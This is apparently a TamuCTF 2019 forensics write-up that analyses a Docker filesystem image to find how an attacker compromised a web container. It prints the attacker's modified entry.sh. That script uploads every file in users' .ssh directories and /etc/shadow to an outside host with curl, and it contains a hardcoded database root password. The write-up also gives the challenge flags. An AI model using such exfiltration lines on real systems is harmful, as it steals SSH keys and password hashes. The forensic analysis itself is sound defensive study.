+++
title = "MicroServices - 3_Forensics"
description = "TamuCTF 2019 - Forensic (100 pts)"
keywords = "Forensic, Docker, Image, WriteUp, CTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = "2019-02-20T10:50:28+01:00"
weight = 10
draft = false
bref = "TamuCTF 2019 - Forensic (100 pts)"
toc = true
aliases = [
    "/docs/3forensics",
]
+++

### Challenge details

| Event        | Challenge                   | Category | Points | Solves |
|--------------|-----------------------------|----------|--------|--------|
| TamuCTF 2019 | MicroServices - 3_Forensics | Forensic | 100    | 47     |

Download: [filesystem.image](https://drive.google.com/uc?id=19zgsmqMZ_QltLYzWcCdxizV9Wipj-2NI&export=download) - md5: 490c78e249177e6478539f459ca14e87

### Description
> Thanks for that information. It seems that one of our developers didn't pay attention to what he was copying off of the internet. Can you help use figure out the extent of what the attacker was able to do?

> 1.   What are the last names of customers who got compromised? (alphabetical order, Capitalized first letter, comma separated ex: Asdf,Bsdf)
> 2.   What is the md5sum of the file that was used to exfiltrate data initially?
> 3.   What is the md5sum of the file that was stolen after the attacker logged in?

[filesystem.image](https://drive.google.com/uc?id=19zgsmqMZ_QltLYzWcCdxizV9Wipj-2NI&export=download) - md5: 490c78e249177e6478539f459ca14e87

### TL;DR

List docker files, found kaliimage, dig and flag.

### Methology

Something to know when you’re doing forensic work with docker is: absolutely ALL about containers and other files/information related to this service is located here: `/var/lib/docker`.

Let’s list the docker containers that have been used. We’ll go looking for the one who climbs the root in the /tmp folder of the container:

```bash
➜  ls aaa/var/lib/docker/containers 
90814f0051eed67a4dd291c8e3f44836c3cf3bd793818eba2e9ae7d0eedc661e
9e7b7ad707af6c0d04591d59e1b7570b784fc194c1847170d40bafc873da85d4
c7b26c91b07eef1f63c8ea3351477f2344e1873f2af8a1566954ecd0678982da
c8c5438a36920a02375b7fffba9065769a3657ee48d522b5ac9a8eec18b1ad84
```

Each container created contains a configuration file in JSON:

```bash
➜  ls aaa/var/lib/docker/containers/*/config*
aaa/var/lib/docker/containers/90814f0051eed67a4dd291c8e3f44836c3cf3bd793818eba2e9ae7d0eedc661e/config.v2.json
aaa/var/lib/docker/containers/9e7b7ad707af6c0d04591d59e1b7570b784fc194c1847170d40bafc873da85d4/config.v2.json
aaa/var/lib/docker/containers/c7b26c91b07eef1f63c8ea3351477f2344e1873f2af8a1566954ecd0678982da/config.v2.json
aaa/var/lib/docker/containers/c8c5438a36920a02375b7fffba9065769a3657ee48d522b5ac9a8eec18b1ad84/config.v2.json

➜  cat aaa/var/lib/docker/containers/*/config.v2.json | jq | grep -E '"ID"|"Image"'
  "ID": "90814f0051eed67a4dd291c8e3f44836c3cf3bd793818eba2e9ae7d0eedc661e",
    "Image": "tamuctf/kaliimage",
  "Image": "sha256:420f4338bea593a9a96151c51b3f5550fac8f7c29cb41c451b4d07c02cf9b28d",
  "ID": "9e7b7ad707af6c0d04591d59e1b7570b784fc194c1847170d40bafc873da85d4",
    "Image": "redis:4",
  "Image": "sha256:3ddb7885a5e075ba8ed414d0706059999aa73fceb4249bef7cb293c1ec559dfc",
  "ID": "c7b26c91b07eef1f63c8ea3351477f2344e1873f2af8a1566954ecd0678982da",
    "Image": "mariadb:10.2",
  "Image": "sha256:907f5f6c749d16ddd8f4a75353228a550d8eddd78693f4329c90ce51a99ec875",
  "ID": "c8c5438a36920a02375b7fffba9065769a3657ee48d522b5ac9a8eec18b1ad84",
    "Image": "tamuctf/webfront:latest",
  "Image": "sha256:05585189bd6cb140d5fcee52b95a05a202f3aa2ae62743a749d0d82bcacfbc5c",
```

A surprising image is here: **kaliimage**. Image Docker which has nothing to do on a web server…

In the `/var/lib/lib/docker/overlay2/` folder there are all the intermediate versions of the docker containers, in the form of a hash. Kind of like the commits for GitHub.

```bash
➜  ls aaa/var/lib/docker/overlay2 
030086336adcdf22311680627f9ec604012ecf86ed7f87b2f20c21be94a7e91f
06aa47c261686f54296a2da65bfea7ed577ff79ce2263a320c95f73e2ad51db1
0bdd99e71211b7d42c48fc86936089b1766af62159e78554434d3b7762f88bb4
0dfa81ec47cc9d78701052f24ce164b114279abb425af227eb7664624d64c848
101c6052088fb1d7b9bf6331ae2e3a052a5480b14a5e48e43eb465914880cd68
146731568c44e1ab0d9a339166cd67189b51f6e0166b301f86557aef05b0d55d
[...]
```

Each of these folders has the same architecture:

```bash
➜  tree aaa/var/lib/docker/overlay2/030086336adcdf22311680627f9ec604012ecf86ed7f87b2f20c21be94a7e91f 
aaa/var/lib/docker/overlay2/030086336adcdf22311680627f9ec604012ecf86ed7f87b2f20c21be94a7e91f
├── diff
│   └── etc
│       └── apt
│           └── sources.list
├── link
├── lower
└── work
```

The folder that will interest us will be the `diff` one, which bears its name well because it will record the differences between each container version. That’s why Docker quickly becomes greedy in terms of disk size.

To find what interests me, I did something not very skilled, but which has is exhaustive:

```bash
➜  ls aaa/var/lib/docker/overlay2/*/diff/
aaa/var/lib/docker/overlay2/0dfa81ec47cc9d78701052f24ce164b114279abb425af227eb7664624d64c848/diff/:
etc  tmp  usr  var

aaa/var/lib/docker/overlay2/101c6052088fb1d7b9bf6331ae2e3a052a5480b14a5e48e43eb465914880cd68/diff/:
etc  var

aaa/var/lib/docker/overlay2/146731568c44e1ab0d9a339166cd67189b51f6e0166b301f86557aef05b0d55d/diff/:
etc  lib  tmp  usr  var

aaa/var/lib/docker/overlay2/146d15695f9f4187544729bbd71682fe0fcebce1cd65becfc74f64f3278ea370/diff/:
run

aaa/var/lib/docker/overlay2/146d15695f9f4187544729bbd71682fe0fcebce1cd65becfc74f64f3278ea370-init/diff/:
dev  etc
[LOT OF RESUUUUUUUUULT]
```

But at a quick glance, I saw that an `entry.sh` file had been modified, nothing else on the docker’s filesystem:

```bash
➜  ls aaa/var/lib/docker/overlay2/*/diff/
[...]
aaa/var/lib/docker/overlay2/5d6f4f20fa15dd9d3960358e9b6e257821e3ab277a6ff4db92163d926e5c5e8a/diff/:
entry.sh
[...]

➜  cat aaa/var/lib/docker/overlay2/5d6f4f20fa15dd9d3960358e9b6e257821e3ab277a6ff4db92163d926e5c5e8a/diff/entry.sh 
#!/bin/sh

if [ -n "$DATABASE_URL" ]
    then
    database=`echo $DATABASE_URL | awk -F[@//] '{print $4}'`
    echo "Waiting for $database to be ready"
    while ! mysqladmin ping -h $database --silent; do
        # Show some progress
        echo -n '.';
        sleep 1;
    done
    echo "$database is ready"
    # Give it another second.
    sleep 1;
fi

mysql -uroot -h db -p351BrE7aTQE8 -e 'CREATE DATABASE customers;\
                                USE customers;\
                                CREATE TABLE customer_info(LastName varchar(255), FirstName varchar(255), Email varchar(255), CreditCard varchar(255), Password varchar(255));\
                                INSERT INTO customer_info VALUES ("Meserole", "Andrew", "A@A.com", "378282246310005", "badpass1");\
                                INSERT INTO customer_info VALUES ("Billy", "Bob", "B@A.com", "371449635398431", "badpass2");\
                                INSERT INTO customer_info VALUES ("Suzy", "Joe", "S@A.com", "378734493671000", "badpass3");\
                                INSERT INTO customer_info VALUES ("John", "Doe", "J@A.com", "6011000990139424", "badpass4");\
                                INSERT INTO customer_info VALUES ("Frank", "Ferter", "F@A.com", "3566002020360505", "badpass5");\
                                INSERT INTO customer_info VALUES ("Orange", "Chair", "O@A.com", "4012888888881881", "badpass6");\
                                INSERT INTO customer_info VALUES ("Face", "Book", "C@A.com", "5105105105105100", "badpass7");\'

find /tmp/home -type d -name ".ssh" 2> /dev/null > /tmp/ljkasdhg
find /tmp/root -type d -name ".ssh" 2> /dev/null >> /tmp/ljkasdhg

sleep 2m;

while read line; do
    find $line -type f -exec curl -k -F 'data=@{}' https://10.91.9.93/ \;
done < /tmp/ljkasdhg

curl -k -F 'data=@/tmp/etc/shadow' https://10.91.9.93/

service apache2 stop;
apache2 -D FOREGROUND;
```

![gif](https://media.giphy.com/media/K90ckojkohXfW/giphy.gif)

It's Christmas, we found the file modified by the attacker and what allowed him to do yolo with the system. He modified database entries, retrieved `/etc/shadow`, information about users' `.ssh` folders.

The compromised users are therefore:

```text
Flag 1: Billy,Face,Frank,John,Meserole,Orange,Suzy
```

The file that was used to extract data from the data is therefore `entry.sh`:

```text
Flag 2: 14b0d800ce6f2882a6f058b45fc500c8
```

Still in the same perspective as to find the `entry.sh`, I listed the diff folders. In fact, I thought we were looking for a SQL backup or something like that, modifying a database without getting the backups is like ransomware that doesn’t delete clear files…

```bash
➜  ls aaa/var/lib/docker/overlay2/*/diff/
[...]
aaa/var/lib/docker/overlay2/e714d5d9a9c2b274dc598376078e089556081865d541bfa9aef768b1982ba0b3/diff/:
data-dump.sql  run  tmp
[...]

➜  cat aaa/var/lib/docker/overlay2/e714d5d9a9c2b274dc598376078e089556081865d541bfa9aef768b1982ba0b3/diff/data-dump.sql
[BAD IDEA TOO MUCH DATA]

➜  md5sum aaa/var/lib/docker/overlay2/e714d5d9a9c2b274dc598376078e089556081865d541bfa9aef768b1982ba0b3/diff/data-dump.sql
6d47d74d66e96c9bce2720c8a56f2558  aaa/var/lib/docker/overlay2/e714d5d9a9c2b274dc598376078e089556081865d541bfa9aef768b1982ba0b3/diff/data-dump.sql
```

```text
Flag 3: 6d47d74d66e96c9bce2720c8a56f2558
```

#### Flag

`6d47d74d66e96c9bce2720c8a56f2558`

[Maki](https://twitter.com/maki_chaz)
